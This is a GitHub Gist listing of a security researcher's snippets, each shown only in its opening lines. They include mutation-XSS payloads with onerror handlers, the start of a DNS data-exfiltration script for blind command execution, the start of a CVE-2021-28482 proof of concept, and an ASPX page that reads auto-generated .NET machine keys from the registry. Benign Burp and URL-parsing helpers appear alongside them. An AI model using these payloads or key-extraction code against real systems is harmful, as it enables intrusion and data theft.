Skip to content

Instantly share code, notes, and snippets.

View irsdl's full-sized avatar
💭
< ⊙ ͜ʖಠ />

Soroush Dalili irsdl

💭
< ⊙ ͜ʖಠ />
View GitHub Profile
@irsdl
irsdl / iso-8859-1_to_binary.py
Last active March 19, 2018 10:16
Convert from iso-8859-1 to binary
# Convert from iso-8859-1, utf-8ed to binary!
# Useful for file disclosure when encoding can be controlled
# The following C# code shows an example (result is iso-8859-1, utf-8ed!):
###string encoding = "iso-8859-1";
######string sourceFile = @"Newtonsoft.Json.dll";
######
######public void test()
######{
#########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding);
#########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile;
@irsdl
irsdl / dns_data_exfiltration.sh
Created October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
#!/bin/bash
: '
Usage:
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns
Todo:
1. add support for powershell
something like the following should do the trick but haven't tested it:
outer_cmd_template="powershell -enc %CMD_B64%"
@irsdl
irsdl / dns_data_exfiltration.sh
Created October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
#!/bin/bash
: '
Usage:
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns
Todo:
1. add support for powershell
something like the following should do the trick but haven't tested it:
outer_cmd_template="powershell -enc %CMD_B64%"
@irsdl
irsdl / mXSS
Last active December 30, 2021 21:47
some mXSS samples
<img alt="<x" title="/><img src=url404 onerror=xss(0)>">
<img alt="
<x" title="/>
<img src=url404 onerror=xss(1)>">
<style><style/><img src=url404 onerror=xss(2)>
<xmp><xmp/><img src=url404 onerror=xss(3)>
@irsdl
irsdl / PoC_CVE-2021-28482.py
Created September 7, 2021 21:15 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@irsdl
irsdl / bambdas_highlighter.java
Created November 27, 2023 21:54
Highlighting case using Burp Suite Bambda
// by @irsdl
boolean manualColorHighlightEnabled = true; // e.g. BurpRed anywhere in the request
boolean pwnFoxColorHighlightEnabled = true; // to support PwnFox Firefox extension containers
// BEGIN HIGHLIGHT LOGIC {
boolean hasAlreadyBeenColoured = false;
/* Manual highlight logic to see something like BurpRed */
if(manualColorHighlightEnabled){
Pattern manualHighlightPattern = Pattern.compile("burp([a-z]{3,7}+)", Pattern.CASE_INSENSITIVE); // like burpRed or burpYellow
@irsdl
irsdl / pyscripter_snippets.py
Last active January 5, 2024 05:04 — forked from lanmaster53/pyscripter-snippets.py
Burp Python Scripter scripts
# ***********************************************replacer_for_python_scripter
import re,random
print callbacks.getToolName(toolFlag)
if(messageIsRequest):
if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"):
requestInfo = helpers.analyzeRequest(messageInfo)
headers = requestInfo.getHeaders()
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
msg = helpers.bytesToString(msgBody)
@irsdl
irsdl / urlhostname_test.js
Created March 14, 2024 10:54
To evaluate how `URL(url).hostname` in JS handles discarded characters and character conversions in domain names.
// by @irsdl
// This script identifies anomalies in how JS parses the URL using `URL(url).hostname`:
// 1- Characters that are ignored when present in the domain name.
// 2- Characters that can replace ASCII characters in domain names and still be parsed correctly. In here we want letter S in `soroush.me`
// You can try running this script in your browser's dev console or at https://www.jdoodle.com/execute-nodejs-online/
// I am sure this must have been looked at before but I cannot find a reference
for (let i = 0; i <= 0xFFFF; i++) {
const unicodeChar = String.fromCharCode(i);
const urlString = `http://sorous${unicodeChar}h.me/blog/`;
@irsdl
irsdl / machineKeyFinder.aspx
Last active March 25, 2024 09:23
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)